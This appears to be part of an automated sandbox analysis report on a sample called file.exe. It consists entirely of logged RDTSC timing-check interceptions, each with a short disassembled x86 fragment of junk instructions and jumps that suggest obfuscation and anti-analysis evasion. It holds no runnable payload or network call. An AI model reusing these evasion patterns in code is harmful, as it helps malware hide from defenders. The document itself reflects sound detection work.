              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19A4 second address: 6E19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC714E8FEE6h 0x0000000a jmp 00007FC714E8FEF0h 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19C5 second address: 6E19C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19C9 second address: 6E19CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19CD second address: 6E19D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19D9 second address: 6E19DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E067E second address: 6E069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98435h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E069A second address: 6E069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E069F second address: 6E06A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E06A7 second address: 6E06B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E06B2 second address: 6E06C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98433h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0E38 second address: 6E0E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E032D second address: 6E0364 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC714E98438h 0x0000000e jmp 00007FC714E98436h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E112F second address: 6E1134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA776 second address: 6EA784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA784 second address: 6EA7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC714E8FEECh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC714E8FEF8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA7B3 second address: 6EA7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9303 second address: 6E9307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E94D3 second address: 6E94DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9645 second address: 6E9658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC714E8FEE6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jbe 00007FC714E8FEE6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9929 second address: 6E993D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC714E9842Fh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E993D second address: 6E995D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FC714E8FEECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E995D second address: 6E9969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC714E98428h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9969 second address: 6E9984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FC714E8FEF4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9AB7 second address: 6E9AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC714E98428h 0x0000000a pushad 0x0000000b jmp 00007FC714E9842Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jp 00007FC714E98426h 0x00000018 jc 00007FC714E98426h 0x0000001e popad 0x0000001f pushad 0x00000020 jmp 00007FC714E98437h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6690FE second address: 66910C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007FC714E8FEE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9C64 second address: 6E9C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9C6A second address: 6E9C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC714E8FEFDh 0x0000000c jmp 00007FC714E8FEF5h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9F2A second address: 6E9F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA04E second address: 6EA052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA180 second address: 6EA19B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC714E98432h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA19B second address: 6EA1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA1A0 second address: 6EA1DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC714E9842Ch 0x00000008 pushad 0x00000009 jmp 00007FC714E98431h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FC714E98438h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FC5C second address: 68FC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FC62 second address: 68FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FC6B second address: 68FC76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FC714E8FEE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FC76 second address: 68FC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007FC714E9842Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8ED2 second address: 6E8EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FC714E8FEECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B44D6 second address: 6B44F2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jne 00007FC714E98426h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B44F2 second address: 68F0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEECh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FC714E8FEE8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 js 00007FC714E8FEEAh 0x0000002c mov dx, C201h 0x00000030 mov edx, dword ptr [ebp+122D2BA3h] 0x00000036 mov dword ptr [ebp+1248C44Fh], ecx 0x0000003c call dword ptr [ebp+122D25E8h] 0x00000042 jmp 00007FC714E8FEF9h 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FC714E8FEEAh 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4961 second address: 4EEE8F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC714E98428h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add edx, dword ptr [ebp+122D2B4Bh] 0x00000013 push edi 0x00000014 mov dword ptr [ebp+122D1F2Ah], ecx 0x0000001a pop edx 0x0000001b push dword ptr [ebp+122D0CA9h] 0x00000021 sub dword ptr [ebp+122D2EE3h], ecx 0x00000027 call dword ptr [ebp+122D1D52h] 0x0000002d pushad 0x0000002e jmp 00007FC714E98430h 0x00000033 xor eax, eax 0x00000035 xor dword ptr [ebp+122D1CB3h], ebx 0x0000003b ja 00007FC714E9842Ch 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007FC714E9842Eh 0x0000004a mov dword ptr [ebp+122D2BCBh], eax 0x00000050 mov dword ptr [ebp+122D265Bh], eax 0x00000056 mov esi, 0000003Ch 0x0000005b mov dword ptr [ebp+122D265Bh], edx 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 jbe 00007FC714E9842Ch 0x0000006b mov dword ptr [ebp+122D1F71h], edx 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D1CB3h], ecx 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d mov dword ptr [ebp+122D247Eh], eax 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 jmp 00007FC714E9842Fh 0x0000008c nop 0x0000008d push eax 0x0000008e push edx 0x0000008f push ebx 0x00000090 push edi 0x00000091 pop edi 0x00000092 pop ebx 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4ACA second address: 6B4AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4AD1 second address: 6B4B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 63FEDC4Bh 0x0000000e jmp 00007FC714E98430h 0x00000013 push 0FDC0BE1h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b jmp 00007FC714E98435h 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4DDA second address: 6B4DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4E60 second address: 6B4E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC714E98428h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4F8F second address: 6B4F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4F93 second address: 6B4FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC714E98426h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4FA1 second address: 6B4FB2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4FB2 second address: 6B4FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4FB9 second address: 6B4FFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC714E8FEE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov cl, bh 0x00000026 xor dword ptr [ebp+122D2559h], ecx 0x0000002c push 00000004h 0x0000002e nop 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4FFB second address: 6B5018 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC714E98428h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 jg 00007FC714E9842Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5018 second address: 6B5020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5020 second address: 6B5024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5844 second address: 6B58A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC714E8FEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FC714E8FEECh 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC714E8FEE8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e xor edx, dword ptr [ebp+122D5CE0h] 0x00000034 cmc 0x00000035 lea eax, dword ptr [ebp+124992A2h] 0x0000003b mov edi, dword ptr [ebp+122D1CF5h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 jne 00007FC714E8FEE6h 0x0000004b pop edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B58A0 second address: 68FC5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC714E98428h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 call dword ptr [ebp+1245B637h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f jmp 00007FC714E9842Eh 0x00000034 je 00007FC714E98426h 0x0000003a pop esi 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2D91 second address: 6F2D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2D98 second address: 6F2DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E98430h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2DAD second address: 6F2DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC714E8FEE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F306C second address: 6F3072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3072 second address: 6F3090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FC714E8FEF6h 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3090 second address: 6F30A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F31F9 second address: 6F3219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF9h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F34F0 second address: 6F34F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6B91 second address: 6F6BA1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC714E8FEE6h 0x00000008 jns 00007FC714E8FEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6BA1 second address: 6F6BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6BA7 second address: 6F6BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F645E second address: 6F646C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jbe 00007FC714E98426h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66758C second address: 667590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667590 second address: 667596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659BAF second address: 659BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FC714E8FEE6h 0x0000000c jmp 00007FC714E8FEF9h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659BD4 second address: 659BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC714E9842Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA258 second address: 6FA25D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA25D second address: 6FA271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 js 00007FC714E98426h 0x0000000c jne 00007FC714E98426h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC617 second address: 6FC61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC61D second address: 6FC625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC625 second address: 6FC634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC714E8FEE6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC634 second address: 6FC63E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E98426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700D51 second address: 700D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B529A second address: 6B5349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FC714E98426h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FC714E9842Ah 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FC714E98428h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000004h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FC714E98428h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e jmp 00007FC714E98438h 0x00000053 jp 00007FC714E9842Eh 0x00000059 nop 0x0000005a jno 00007FC714E98443h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 pop esi 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701407 second address: 701427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 jc 00007FC714E8FEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701427 second address: 701448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC714E98431h 0x0000000d ja 00007FC714E98426h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E7E second address: 706E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E83 second address: 706E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
